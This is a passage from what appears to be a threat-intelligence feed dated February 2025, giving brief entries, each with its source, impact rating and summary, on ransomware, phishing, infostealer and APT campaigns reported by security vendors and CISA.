Summary:: A recently discovered cyberattack leveraging the CVE-2024-24919 vulnerability in Check Point’s security framework, which was patched in May 2024. Attackers exploit this flaw to steal VPN credentials and deploy ShadowPad malware. In some cases, NailaoLocker ransomware is also installed. The attackers used lateral movement techniques, such as RDP and SMB, to escalate privileges and target Domain Controllers. The campaign primarily impacted organizations in Europe, Africa, and the Americas, especially within the manufacturing sector.

Source: https://blog.checkpoint.com/security/check-point-research-explains-shadow-pad-nailaolocker-and-its-protection/

Intel Source:: K7 Security Labs

Intel Name:: LCRYX_Ransomware

Date of Scan:: 2025-02-25

Impact:: MEDIUM

Summary:: Researchers from K7 labs has discovered the LCRYX ransomware that first emerged in November 2024. It is written in VBScript and demands ransom in Bitcoin to decrypt the victim’s system. This ransomware starts working with full admin access and disable the antivirus protection. It blocks access to Task Manager, CMD, and the Control panel and deletes the backup files to prevent user from recovering their data. The ransomware encrypts files with the .lcryx extension. Once encryption is complete, LCRYX generates a ransom note on the desktop and instruct victims to visit a website and pay the ransom in bitcoin for file decryption.

Source: https://labs.k7computing.com/index.php/lcryx-ransomware-how-a-vb-ransomware-locks-your-system/

Intel Source:: ThreatDown

Intel Name:: QR_Code_Phish_Steals_Microsoft_Login

Date of Scan:: 2025-02-25

Impact:: MEDIUM

Summary:: Researchers at ThreatDown have uncovered a phishing attack targeting employees through personalized emails that promise "enhanced bonuses" and include a QR code that leads to a fake Microsoft login page. The email appears to originate from a trusted HR department, making it more challenging for employees to identify it as a scam. Once the victim inputs their corporate login credentials, the attackers can steal sensitive data and potentially initiate further attacks, such as ransomware.

Source: https://www.threatdown.com/blog/enhanced-bonus-qr-code-phish-steals-microsoft-credentials/

Intel Source:: The DFIR Report

Intel Name:: Confluence_Exploit_Triggers_LockBit_Ransomware

Date of Scan:: 2025-02-24

Impact:: HIGH

Summary:: The attack began by exploiting a Confluence vulnerability (CVE-2023-22527) on an exposed Windows server, which led to the deployment of LockBit ransomware. The attacker used mshta to deploy a Metasploit stager and then installed AnyDesk for persistent access. After terminating processes, they regained control, created a new admin account, and moved laterally via RDP, targeting a backup server and extracting Veeam credentials. Data was exfiltrated using Rclone. On the domain controller, the attacker enumerated admin group memberships and launched LockBit ransomware with PDQ Deploy, encrypting systems within two hours.

Source: https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/

Intel Source:: Cyble

Intel Name:: Deployment_of_AsyncRAT

Date of Scan:: 2025-02-24

Impact:: LOW

Summary:: Cyble researchers have identified a malware campaign that trick users into running malicious files disguised as wallpaper with animated characters. The attackers use malicious LNK files to execute a hidden PowerShell script which downloads and runs additional payloads. They employ on open-source tool called Null-AMSI to bypass Windows security features and avoid detection. The malware encrypts and compresses its payloads using AES encryption and GZIP compression. The final payload installs AsyncRAT which allows attacker to control the compromised system, steal data and deploy more malware.

Source: https://cyble.com/blog/null-amsi-evading-security-to-deploy-asyncrat/

Intel Source:: Cyfirma

Intel Name:: Fake_CAPTCHA_Campaign

Date of Scan:: 2025-02-24

Impact:: LOW

Summary:: Cyfirma researchers have uncovered fake CAPTCHA verification campaign called ClickFix that trick users into downloading and running malware. In this campaign, users are redirected to phishing page to verify fake CAPTCHA. Once clicked on the link, it executes a PowerShell script that downloads malware from remote servers. The PowerShell script operates silently and download zip file that contain Lumma stealer which is designed to harvest sensitive information.

Source: https://www.cyfirma.com/research/fake-captcha-malware-campaign-how-cybercriminals-use-deceptive-verifications-to-distribute-malware/

Intel Source:: ASEC

Intel Name:: LummaC2_Malware_disguise_as_Total_Commander

Date of Scan:: 2025-02-24

Impact:: LOW

Summary:: ASEC researchers have observed that the cybercriminals are distributing LummaC2 stealer disguise as cracked version of Total Commander, a Window file manager. The attackers are targeting users who are searching for Total Commander Crack on google and if users click on the result, it goes through the multiple websites to download the malware. They even post fake requests on Reddit and add malicious links in their replies to lure victims.

Source: https://asec.ahnlab.com/ko/86396/

Intel Source:: CISA

Intel Name:: Ghost_Cring_Ransomware

Date of Scan:: 2025-02-21

Impact:: HIGH

Summary:: The FBI, CISA, and MS-ISAC have issued a joint advisory on Ghost (Cring) ransomware, detailing the methods and impact of attacks by this group of threat actors, primarily located in China. Ghost actors target organizations globally, exploiting vulnerabilities in outdated software and firmware to infiltrate networks, with a focus on critical infrastructure, healthcare, education, and small businesses. These attackers use common tools like Cobalt Strike and Mimikatz for privilege escalation and credential theft, and employ tactics to evade detection and hinder system recovery. Ghost actors typically encrypt data using various ransomware executables and demand ransom in cryptocurrency for decryption keys. While exfiltration is rare, the encrypted data remains inaccessible without payment.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a

Intel Source:: Proofpoint

Intel Name:: TA2726_and_TA2727_Identified

Date of Scan:: 2025-02-21

Impact:: MEDIUM

Summary:: Researchers from Proofpoint have discovered two new cybercriminal threat actors, TA2726 and TA2727, who run web inject campaigns and distribute malware. These actors use hijacked websites to send bogus update-themed lures, adding to the already complicated field of web inject attacks. Notably, TA2727 was spotted transmitting FrigidStealer, a newly found MacOS information stealer, as well as malware for Windows and Android.

Source: https://www.proofpoint.com/us/blog/threat-insight/update-fake-updates-two-new-actors-and-new-mac-malware

Intel Source:: Trend Micro

Intel Name:: Earth_Preta_Blends_Legit_and_Malicious_Files

Date of Scan:: 2025-02-21

Impact:: LOW

Summary:: Trend Micro researchers have discovered that Earth Preta (Mustang Panda) uses Microsoft Application Virtualization Injector to inject payloads into waitfor.exe when detecting ESET antivirus. They employ Setup Factory to drop and execute malicious payloads, ensuring persistence and evading detection. The attack involves dropping multiple files, including legitimate executables and a decoy PDF to mislead the victim. The malware, a variant of TONESHELL, is sideloaded with a legitimate Electronic Arts application and communicates with a command-and-control server for data exfiltration.

Source: https://www.trendmicro.com/en_us/research/25/b/earth-preta-mixes-legitimate-and-malicious-components-to-sidestep-detection.html

Intel Source:: Cofense

Intel Name:: Phishing_Campaign_Targets_Amazon_Users

Date of Scan:: 2025-02-20

Impact:: LOW

Summary:: Researchers from Cofense have uncovered a phishing campaign targeting Amazon Prime users. The campaign starts with an email that appears to be a legitimate notification from Amazon prime which claim that the recipient’s payment method has expired or is no longer valid. This email creates urgency for the recipient who might be pushed to click on a button to check their payment information. When user clicks on the link, it redirects to google docs page. This tactic targets login credentials and additional details such as verification and payment details for illicit purposes.

Source: https://cofense.com/blog/amazon-phish-hunts-for-security-answers-and-payment-information

Intel Source:: Fortinet

Intel Name:: New_Variant_of_Snake_Keylogger

Date of Scan:: 2025-02-20

Impact:: LOW

Summary:: FortiGuard researchers have discovered a new variant of Snake Keylogger also known as the 404 Keylogger targeting Window users. This malware mainly focuses on China, Turkey, Indonesia, Taiwan, and Spain. It has been identified as AutoIt/Injector.GTY!tr and has been responsible for over 280 million blocked infection attempts worldwide. This variant of Snake Keylogger primarily spread through phishing emails that contain either attachment or link. It targets web browsers like Chrome, Edge and Firefox, stealing sensitive information such as credentials and data by logging keystrokes, capturing credentials and monitoring the clipboard. The stolen data is then exfiltrated to its C2 server via email and Telegram bots.

Source: https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant

Intel Source:: Any.Run

Intel Name:: Phishing_Campaign_Drops_Zhong_Stealer

Date of Scan:: 2025-02-20

Impact:: LOW

Summary:: Researchers at ANY.RUN have observed a phishing campaign distributing a newly discovered stealer malware, Zhong Stealer, that targets the cryptocurrency and finance sectors. The Quetzal Team monitored this campaign from December 20 to 24, 2024, during which phishing tactics were used to deceive customer care team members into opening malicious ZIP files.

Source: https://any.run/cybersecurity-blog/zhong-stealer-malware-analysis/

Intel Source:: malwr-analysis

Intel Name:: Arechclient2_Malware

Date of Scan:: 2025-02-20

Impact:: LOW

Summary:: Arechclient2 is also known as SectopRAT malware which is written in .NET that allows attackers remote access to an infected system. It uses hidden technique called Calli obfuscation which makes it hard to detect. This malware has various capabilities that includes scanning of web browsers to collect information about installed extensions, saved usernames, passwords, and cookies. It searches for VPN services like NordVPN and ProtonVPN, gathers system details such as hardware and operating system details, Telegram and Discord settings. Additionally, it searches for FTP credentials and cryptocurrency wallets to steal financial data.

Source: https://malwr-analysis.com/2025/02/18/arechclient2-malware-analysis-sectoprat/

Intel Source:: ASEC

Intel Name:: Rhadamanthys_Distributed_via_MSC_Extension

Date of Scan:: 2025-02-19

Impact:: LOW

Summary:: Researchers at AhnLab have identified that the Rhadamanthys infostealer is being distributed using files with the .MSC extension which are associated with Microsoft Management Console (MMC) files. These files allow the execution of various scripts ,commands or programs. The attackers are using two methods to execute these malicious MSC files. The first method is to exploit a vulnerability (CVE-2024-43572) which is no longer effective because it has been patched by Microsoft and other method is Console Taskpad to run malicious commands.

Source: https://asec.ahnlab.com/ko/86354/

Intel Source:: Trac Labs

Intel Name:: GhostWeaver_Backdoor

Date of Scan:: 2025-02-19

Impact:: LOW

Summary:: TRAC Labs researchers have uncovered a malware campaign that tricks users with fake browser update notification on compromised website. When user clicks on it, a JavaScript file runs in the background and downloads a malware loader called MintsLoader. This loader then installs an advanced PowerShell based backdoor named GhostWeaver. This malware allows attackers to maintain control over compromised system remotely by connected to its C2 server. It is designed to steal sensitive information such as saved passwords from web browsers like Chrome, Firefox and Edge, Outlook emails and cryptocurrency wallets.

Source: https://trac-labs.com/dont-ghost-the-socgholish-ghostweaver-backdoor-574154dd9983

Intel Source:: K7 Labs

Intel Name:: Malicious_PoC_Exploit_Abuse_on_GitHub

Date of Scan:: 2025-02-19

Impact:: LOW

Summary:: Researchers at K7 Labs have observed that a spelling error in their proof-of-concept exploit release for CVE-2024-49112 resulted in threat actors creating a malicious GitHub repository. The attackers attempted to fool researchers and security professionals by falsely claiming that their file was the legitimate proof of concept for CVE-2024-49113. This case shows how tiny faults can be used for malicious purposes.

Source: https://labs.k7computing.com/index.php/ldapnightmare-spoof-stealer/

Intel Source:: SpiderLabs

Intel Name:: Phishing_Attack_Uses_Pinterest_Bookmarks

Date of Scan:: 2025-02-18

Impact:: LOW

Summary:: A phishing campaign is using fake timesheet report emails to spread the Tycoon 2FA phishing kit. The attackers are now exploiting Pinterest visual bookmarks as intermediaries to deceive users and steal sensitive information.

Source: https://x.com/SpiderLabs/status/1891529685755998521

Intel Source:: Netskope

Intel Name:: Go_Based_Backdoor_Using_Telegram_C2

Date of Scan:: 2025-02-18

Impact:: LOW

Summary:: Netskope researchers have discovered a new Go-based backdoor malware, potentially of Russian origin. The malware uses Telegram as its command and control (C2) channel, which is uncommon but highly effective. This makes detection difficult for defenders. The malware appears to still be under development but is already fully functional. Using cloud apps like Telegram for C2 communication allows attackers to bypass infrastructure requirements and blend in with normal user activity, complicating detection efforts.

Source: https://www.netskope.com/blog/telegram-abused-as-c2-channel-for-new-golang-backdoor

Intel Source:: CYFIRMA

Intel Name:: Latest_Attacks_by_CL0P_Ransomware

Date of Scan:: 2025-02-18

Impact:: MEDIUM

Summary:: The Cl0p ransomware group, active since 2019, recently targeted 43 organizations and exfiltrated sensitive data. This attack targets various industries, including manufacturing, retail, transportation, software, finance, internet, and business services. The affected organizations are located in multiple countries, including the US, Canada, Netherlands, France, and Greece. While the names of the targeted organizations have been published on the group's leak site, the exfiltrated data has not yet been released.

Source: https://www.cyfirma.com/research/cl0p-ransomware-latest-attacks/

Intel Source:: Scilabs

Intel Name:: Golden_Mexican_Wolf_Ransomware_Group

Date of Scan:: 2025-02-17

Impact:: MEDIUM

Summary:: Researchers from Scilabs have identified a new ransomware called Golden Mexican Wolf which targets Mexico’s service sector organisations. Its primary focus is financial gain through stealing and encrypting sensitive information from victims. This group remains hidden with in the network for conducting reconnaissance, dumps credential and maintain persistence across the network. Their primary target is Active Directory where they distribute the ransomware to encrypt data. They often contact victim through SMS, emails and WhatsApp using English and Spanish and send some sample of stolen information and threaten to release it if the ransom is not paid.

Source: https://blog.scilabs.mx/en/golden-mexican-wolf-new-ransomware-targeting-mexico/

Intel Source:: Cyfirma

Intel Name:: Vdog_Ransomware

Date of Scan:: 2025-02-17

Impact:: MEDIUM

Summary:: Researchers at Cyfirma have discovered the Vgod ransomware which targets Windows systems. It encrypts files and renames them by adding the .Vgod extension while modifying the desktop wallpaper. The attackers employ a double extortion tactic in which they steal sensitive information and threaten victims to publish it.

Source: https://www.cyfirma.com/research/vgod-ransomware/

Intel Source:: Fortinet

Intel Name:: Lynx_Ransomware_Evolution

Date of Scan:: 2025-02-17

Impact:: LOW

Summary:: Researchers at FortiGuard Labs have found the Lynx ransomware, which was first seen in July 2024. It is completely similar to INC ransomware, which first surfaced in July 2023, prompting researchers to suspect that Lynx is an improved version. Both varieties of ransomware encrypt files on Windows systems and display a ransom letter on the desktop, attempting to print it.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-lynx

Intel Source:: ClearSky Cyber Security

Intel Name:: Windows_UI_Vulnerability_Exploited_by_APT

Date of Scan:: 2025-02-17

Impact:: LOW

Summary:: ClearSky researchers have identified a UI vulnerability in Microsoft Windows that is being actively exploited by the Chinese APT group, Mustang Panda. The vulnerability affects RAR file extraction, where extracted files become invisible in Windows Explorer, appearing as empty folders. These files are still accessible via command line if the exact path is known. Additionally, executing the "attrib -s -h" command can reveal system-protected files, leading to the creation of an unknown ActiveX component with an "Unknown" file type.

Source: https://x.com/ClearskySec/status/1890056915230544224

Intel Source:: Trend Micro

Intel Name:: CVE_2025_0411_Exploited_in_Ukraine

Date of Scan:: 2025-02-17

Impact:: LOW

Summary:: Researchers at Trend Micro have discovered the active exploitation of a 7-Zip zero-day vulnerability, CVE-2025-0411, in a SmokeLoader malware campaign targeting Ukrainian enterprises. This bug, discovered in September 2024, enables attackers to evade Windows Mark-of-the-Web protections via double archiving, allowing malicious files to be executed without security checks. Russian cybercriminals used spear-phishing operations and homoglyph attacks to impersonate document extensions, aiding malware transmission. The vulnerability was discovered to the creator of 7-Zip, resulting in a patch in version 24.09, which was released on November 30, 2024.

Source: https://www.trendmicro.com/en_us/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html

Intel Source:: Esentire

Intel Name:: RedCurl_EarthKapre_APT_Attack_Chain

Date of Scan:: 2025-02-16

Impact:: LOW

Summary:: Researchers from eSentire have identified a sophisticated cyber espionage campaign by the EarthKapre/RedCurl APT group aimed at the legal sector. The attack starts with a phishing email containing an Indeed-themed PDF that tricked victims into downloading a malicious ISO package. This file mounts an external drive and displays a seemingly valid Adobe program (ADNotificationManager.exe), which then loads the EarthKapre loader (netutils.dll).

Source: https://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt

Intel Source:: Cloudsek

Intel Name:: DeepSeek_ClickFix_Campaign

Date of Scan:: 2025-02-16

Impact:: LOW

Summary:: CloudSek researcher have identified a new Clickfix phishing campaign where threat actors are exploiting the popularity of DeepSeek. In this campaign, victims are tricked into clicking on fake CAPTCHA verification link. These links redirects victims to the installation of malware such as Vidar and Lumma malware which steals sensitive information like password, banking details and browser information.

Source: https://www.cloudsek.com/blog/deepseek-clickfix-scam-exposed-protect-your-data-before-its-too-late

Intel Source:: Cofense

Intel Name:: Fake_Adobe_App_Abusing_Microsoft_Login

Date of Scan:: 2025-02-16

Impact:: LOW

Summary:: Cofense researchers have discovered a phishing campaign targeting Microsoft users by tricking them in to revealing their login credentials. The attack starts with a deceptive email that appears to be an office 365 password reset request however the sender’s email address is not associated with a Microsoft domain. In this campaign, users are redirected to a legitimate Mircsoft authentication page they are asked to grant permission to a malicious third-party application called Adobe Drive X. If the user approves the request and enter the credentials, the attackers can steal sensitive information and potentially gain access to the victim’s emails.

Source: https://cofense.com/blog/oauth-phishing-alert-fake-adobe-drive-x-app-abusing-microsoft-login

Intel Source:: Volexity

Intel Name:: Russian_Threat_Actors_Target_M365_Accounts

Date of Scan:: 2025-02-16

Impact:: LOW

Summary:: Researchers at Volexity have identified many Russian threat actors performing social engineering and spear-phishing attempts to breach Microsoft 365 accounts using Device Code Authentication phishing. These attacks, which began in mid-January 2025, were politically motivated and included impersonations of officials from the United States Department of State, Ukraine's Ministry of Defense, and the European Union Parliament. Phishing emails, Microsoft Teams invitations, and secure chat applications were used by threat actors to trick victims into giving them access.

Source: https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/

Intel Source:: Recorded Future

Intel Name:: North_Korea_Exploits_Remote_Work_For_Fraud

Date of Scan:: 2025-02-15

Impact:: MEDIUM

Summary:: North Korea is taking advantage of the rise of remote work to infiltrate international companies with fraudulent IT workers using false identities. These operatives violate sanctions, engage in fraud, and pose significant cybersecurity risks, including data theft and cyber espionage. They are linked to cyberattacks targeting the cryptocurrency industry, utilizing malware to steal sensitive information and maintain persistent access. Furthermore, North Korea has created fake IT companies to further embed itself in global supply chains.

Source: https://go.recordedfuture.com/hubfs/reports/cta-nk-2025-0213.pdf

Intel Source:: LAC Watch

Intel Name:: Winnti_Group_Targeting_Japanese_Organisations

Date of Scan:: 2025-02-15

Impact:: MEDIUM

Summary:: LAC Watch researchers have uncovered a new attack campaign dubbed RevivalStone conducted by Chinese threat actor Winnti group also known as APT41 targeting Japanese companies such as manufacturing, materials, and energy sectors. This campaign has been active since March 2024 in which attackers exploiting SQL Injection vulnerabilities in ERP systems to gain initial access. They install web shells like China Chopper, Behinder, and sqlmap file uploader which allow them to move through the network, steal credentials and gather intelligence. After getting the access, the attackers deploy advanced version of Winnti malware and use AES and Chacha20 encryption method to secure communications.

Source: https://www.lac.co.jp/lacwatch/report/20250213_004283.html

Intel Source:: Securonix Threat Labs

Intel Name:: Analyzing_DEEP_DRIVE

Date of Scan:: 2025-02-15

Impact:: MEDIUM

Summary:: Securonix researchers have identified an ongoing campaign called DEEP#DRIVE targeting South Korean businesses, government agencies and cryptocurrency users. The attackers use phishing emails embedded with malicious attachment disguise as legitimate documents such as work logs, insurance forms and crypto-related files to trick victims into opening them. Once user opens these files, a LNK file initiates a PowerShell script that install malware which gather system information and sends it back to the attackers through Dropbox. These files often in .hwp, .xlsx, .pptx formats that hosted on Dropbox. Researchers have attributed this campaign to Kimsuky, a North-Korean APT group based on their TTPs and the use of same Dropbox technique in prior campaigns.

Source: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/

Intel Source:: CYFIRMA

Intel Name:: JavaScript_to_C2_Server_Malware

Date of Scan:: 2025-02-15

Impact:: LOW

Summary:: Cyfirma researchers have analyzed a sophisticated multi-stage malware attack using obfuscation, steganography, and covert communication to bypass detection. It begins with a disguised JavaScript file that executes a PowerShell script, which downloads a malicious JPG image and text file containing hidden executables. These payloads deploy Stealer malware to steal sensitive data, including credentials and browser information. The stolen data is sent to a Telegram bot, allowing attackers to maintain persistence while evading traditional security measures. The attack's use of legitimate services, encryption, and multi-layered obfuscation makes detection and mitigation difficult.

Source: https://www.cyfirma.com/research/javascript-to-command-and-control-c2-server-malware/

Intel Source:: MalwareBytes

Intel Name:: Fake_Etsy_Invoice_Scam

Date of Scan:: 2025-02-14

Impact:: LOW

Summary:: Malwarebytes researcher have identified a phishing campaign in which cybercriminals targeting Etsy sellers. The campaign starts with phishing emails that contains a PDF invoice hosted on a legitimate Etsy domain (etsystatic.com). The attached PDF contains a link that ask seller to confirm their identity or verify account. Once seller clicks on the link. It redirects the seller to fake Etsy login page to design to steal payment information which scammers can then use for fraudulent purchases or sell them on the dark web.

Source: https://www.malwarebytes.com/blog/news/2025/02/fake-etsy-invoice-scam-tricks-sellers-into-sharing-credit-card-information

Intel Source:: Recorded Future

Intel Name:: Fake_Media_Targets_German_Elections

Date of Scan:: 2025-02-14

Impact:: LOW

Summary:: Researchers from Insikt Group have discovered ongoing Russian influence activities aimed at the German federal elections on February 23, 2025. These operations, linked to networks like Doppelgänger, Operation Overload, CopyCop, and Operation Undercut, seek to raise sociopolitical issues, alter public discourse, and undermine trust in democratic institutions.

Source: https://www.recordedfuture.com/research/stimmen-aus-moskau-russian-influence-operations-target-german-elections

Intel Source:: Symantec

Intel Name:: China_Espionage_Tools_Used_in_Ransomware_Attack

Date of Scan:: 2025-02-13

Impact:: LOW

Summary:: In late 2024, tools traditionally used by China-linked espionage groups were deployed in a ransomware attack against a South Asian software company. The attacker exploited a vulnerability in Palo Alto's PAN-OS firewall to gain access, steal cloud credentials, and encrypt the target's machines with RA World ransomware. Interestingly, the tools used were the same as those involved in previous espionage attacks, including the PlugX backdoor. This unusual blend of espionage tools with ransomware raises questions about whether China-linked actors are expanding into financially motivated attacks, a behavior typically seen in other nations like North Korea. The motives behind this shift remain unclear, but it suggests evolving tactics in cyber threats.

Source: https://www.security.com/threat-intelligence/chinese-espionage-ransomware

Intel Source:: Microsoft

Intel Name:: The_BadPilot_Campaign

Date of Scan:: 2025-02-13

Impact:: MEDIUM

Summary:: Microsoft researchers have uncovered a subgroup within the Russian state actor called Seashell Blizzard conducting cyberattacks globally and compromising internet facing infrastructure to maintain long-term access to high-value targets. This group has been active since 2021 and is known for stealthy persistence, credential theft and lateral movement within compromised networks. It targets critical sectors such as energy, oil and gas, telecommunications, shipping, arms manufacturing, and government institutions. This group has leveraged published vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) to gain initial access. It follows three primary tactics like Targeted Attacks – Using phishing, and backdoors, Opportunistic Attacks - exploiting vulnerabilities in internet-facing infrastructure to gain access and Hybrid Attacks – Using supply-chain compromises.

Source: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/

Intel Source:: Elastic

Intel Name:: REF7707_Campaign_Targeting_South_America

Date of Scan:: 2025-02-13

Impact:: MEDIUM

Summary:: Researchers from Elastic Security Labs have discovered a cyber espionage campaign called REF7707 targeting the foreign ministry of a South American country. This campaign is linked to previous attacks in South Asian countries. The attackers of REF7707 campaign relies on advanced malwares such as FINALDRAFT, GUIDLOADER and PATHLOADER which are designed to infiltrate systems, execute malicious code and exfiltrate sensitive data. FINALDRAFT malware has both Window and Linux versions and is capable of stealing data and injecting itself into other programs. The main tactic is using in this campaign cloud services and third-party platforms for C2 communication.

Source: https://www.elastic.co/security-labs/fragile-web-ref7707

Intel Source:: Seqrite

Intel Name:: FCI_Job_Scam_Delivers_Xelera_Ransomware

Date of Scan:: 2025-02-12

Impact:: LOW

Summary:: Seqrite researchers have recently uncovered multiple campaigns involving fake job descriptions targeting individuals applying for technical positions at Food Corporations of India (FCI). This campaign distributes a variant of ransomware called Xelera, written in Python and packed using PyInstaller. On January 18, 2025, a malicious document named FCEI-job-notification.doc was found on VirusTotal, containing an embedded payload in OLE Streams. The payload, named jobnotification2025.exe, executes ransomware tasks and other malicious actions on the target machine via a Discord bot. PyInstaller continues to be a popular tool for deploying Python-based malware in the wild.

Source: https://www.seqrite.com/blog/xelera-ransomware-fake-fci-job-offers/

Intel Source:: Cyberarmor

Intel Name:: Nigerian_Cybercriminals_Distributing_XLogger

Date of Scan:: 2025-02-12

Impact:: LOW

Summary:: Researchers from Cyberarmor have uncovered a malware campaign conducted by Nigerian cybercriminals to collect email address for distributing malware. The attackers start with email harvesting where they gather a list of potential victims through social media, dark forums and Google Dorking techniques to find publicly available email addresses. They then launch phishing campaign from spoofed domains and use Gammadyne Mailer to send bulk emails while hiding their identity with remote access tools. Once a recipient opens the infected file, the XLogger malware silently steals their password and sensitive data from the system and then send all the stolen data to attacker’s telegram channel for further malicious activities.

Source: https://cyberarmor.tech/inside-a-malware-campaign-a-nigerian-hackers-perspective/

Intel Source:: Palo Alto

Intel Name:: StrelaStealer_Targeting_German_Speaking_Users

Date of Scan:: 2025-02-12

Impact:: LOW

Summary:: Recent activity from StrelaStealer continues to utilize WebDAV servers, including the server at the IP address, to host malware. As of February 10, 2025, decoy PDF files are being used in the infection process, which is non-malicious but contains a blurred image to mislead victims. The malware is only triggered when the victim's Windows system has specific German language and locale settings (Austria, Germany, Liechtenstein, Luxembourg, Switzerland).

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-10-IOCs-for-StrelaStealer-activity.txt

Intel Source:: ASEC

Intel Name:: USB_Malware_Mines_Monero_in_South_Korea

Date of Scan:: 2025-02-12

Impact:: LOW

Summary:: ASEC researchers have discovered a case of cryptocurrency-mining malware spread via USB in South Korea. The malware, which mines Monero, uses PC resources without user consent. While mining itself isn't illegal, the unauthorized installation of mining software can be. The malware modifies system settings to optimize performance for mining, disables security measures like Windows Defender, and uses techniques like C&C communication through PostgreSQL and DLL sideloading to evade detection. The malware spreads rapidly via USB and generates significant profit, reportedly over 1 million won daily.

Source: https://asec.ahnlab.com/en/86221/

Intel Source:: malwr-analysis

Intel Name:: NanoCore_RAT_Malware_Analysis

Date of Scan:: 2025-02-12

Impact:: LOW

Summary:: NanoCore is a remote access trojan malware that helps cybercriminals for espionage, information stealing and take control of compromised systems. It is a customizable malware that allow attackers to add multiple features based on their requirements. This malware copies itself to a hidden folder and creates a registry entry to run automatically. It connects to remote C2 servers where attackers can send commands to control the compromised system. The malware records keystrokes, take screenshots and capture clipboard data and sending all this stolen information back to the attacker.

Source: https://malwr-analysis.com/2025/02/10/nanocore-rat-malware-analysis/

Intel Source:: Cloudsek

Intel Name:: UAC0006_Targeting_Ukraine_Largest_Bank

Date of Scan:: 2025-02-11

Impact:: LOW

Summary:: CloudSek researchers have uncovered a phishing campaign conducted by a financially motivated threat group called UAC-0006 targeting Ukraine’s largest state-owned bank, Privat Bank. The attackers leverage phishing email containing password-protected ZIP or RAR files to trick victims into opening malicious files. These files run a malicious java script in the background which triggers hidden PowerShell command that downloads and installs the SmokeLoader malware. UAC-0006 effectively bypasses security detections and maintains long-term access to compromised systems by using JavaScript, VBScript and PowerShell.

Source: https://www.cloudsek.com/blog/getsmoked-uac-0006-returns-with-smokeloader-targeting-ukraines-largest-state-owned-bank

Intel Source:: Black Lotus Labs

Intel Name:: JMagic_Campaign

Date of Scan:: 2025-02-10

Impact:: MEDIUM

Summary:: Black Lotus Labs has uncovered a malware campaign, dubbed "J-magic," targeting Juniper enterprise-grade routers with a custom variant of the open-source backdoor tool, cd00r. This malware leverages "magic packets" to stealthily establish reverse shells on compromised devices, enabling attackers to exfiltrate data and maintain long-term access. Operating primarily in-memory, J-magic evades detection and takes advantage of routers' extended uptime and limited monitoring. The campaign, active from mid-2023 to at least mid-2024, has affected organizations across verticals like semiconductor, energy, and manufacturing, with a particular focus on routers serving as VPN gateways. While similarities exist with the SeaSpy malware, J-magic demonstrates advanced tradecraft with unique features such as an RSA challenge to secure remote access.

Source: https://blog.lumen.com/the-j-magic-show-magic-packets-and-where-to-find-them/

Intel Source:: CISA

Intel Name:: Threat_Actors_Chained_Vulnerabilities_IvantiCSA

Date of Scan:: 2025-02-10

Impact:: MEDIUM

Summary:: CISA and the FBI have issued a joint advisory regarding the exploitation of multiple vulnerabilities in Ivanti Cloud Service Appliances (CSA). Threat actors exploited CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, and CVE-2024-9380 in September 2024 to gain initial access, execute remote code, steal credentials, and deploy webshells. These vulnerabilities were exploited in chained attacks targeting Ivanti CSA versions 4.6 (end-of-life) and certain 5.0.x versions. Exploits included administrative bypass, SQL injection, and command injection. Organizations using affected versions are urged to upgrade to the latest supported version and assume credentials stored on compromised appliances are exposed.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a

Intel Source:: gi7w0rm

Intel Name:: Hunting_WebBased_Credit_Card_Skimmers

Date of Scan:: 2025-02-10

Impact:: LOW

Summary:: gi7w0rm explores techniques for detecting and analyzing web-based credit card skimmers—malicious scripts that target e-commerce websites to steal payment details during online transactions. The author explains how attackers exploit vulnerabilities or steal credentials to inject JavaScript that mimics legitimate payment forms, secretly capturing sensitive information. Tools like Urlscan.io, CyberChef, and Validin are highlighted for their effectiveness in identifying compromised websites and deobfuscating malicious code. A case study illustrates how a WordPress vulnerability was used to inject a skimmer that stole payment data by replacing authentic payment fields with fake ones.

Source: https://gi7w0rm.medium.com/a-beginner-s-guide-to-hunting-web-based-credit-card-skimmers-c820aeee87d6

Intel Source:: ESentire

Intel Name:: NetSupport_RAT_Clickfix_Distribution

Date of Scan:: 2025-02-09

Impact:: LOW

Summary:: Esentire researchers have observed an increase in attacks related to NetSupport RAT. The attackers are using ClickFix tactic to trick users into running malicious PowerShell command. This method involves fake CAPTCHA verification pages on compromised websites to instruct users to copy and execute specific commands that download and install the NetSupport RAT malware. This malware enables attackers to spy on victims in real time, take screenshots, record audio and video and transfer files.

Source: https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution

Intel Source:: ISC.SANS

Intel Name:: Polymorphic_Python_Script_Avoids_Detection

Date of Scan:: 2025-02-09

Impact:: LOW

Summary:: Researchers at ISC SANS have identified a malicious Python script that uses creative anti-debugging tactics to avoid inspection. The script employs multi-threading to conduct numerous evasion strategies concurrently, such as debugger detection, API hook analysis, memory integrity verification, and self-modifying code.

Source: https://isc.sans.edu/diary/rss/31658

Intel Source:: Proofpoint

Intel Name:: Mimic_Tax_Agencies_Targets_Financial_Entities

Date of Scan:: 2025-02-08

Impact:: MEDIUM

Summary:: Proofpoint researchers have uncovered a phishing campaign where threat actors targeting financial organizations and individuals worldwide to take advantage of the tax-filing period. They send phishing emails impersonating legitimate tax agencies such as HM Revenue & Customs (HMRC) in the UK, Intuit in the US and myGov in Australia. These emails use tax-related themes like overdue payments, tax refunds and account update trick people into opening them. These emails either lead them to fake websites to harvest their credentials or contain malicious attachments that installs malware like Rhadamanthys on their systems.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account?utm_source=social_organic&utm_social_network=twitter&utm_campaign=2025&utm_post_id=ea59ad2c-af76-4242-9e8d-3947e3db8856

Intel Source:: c/side

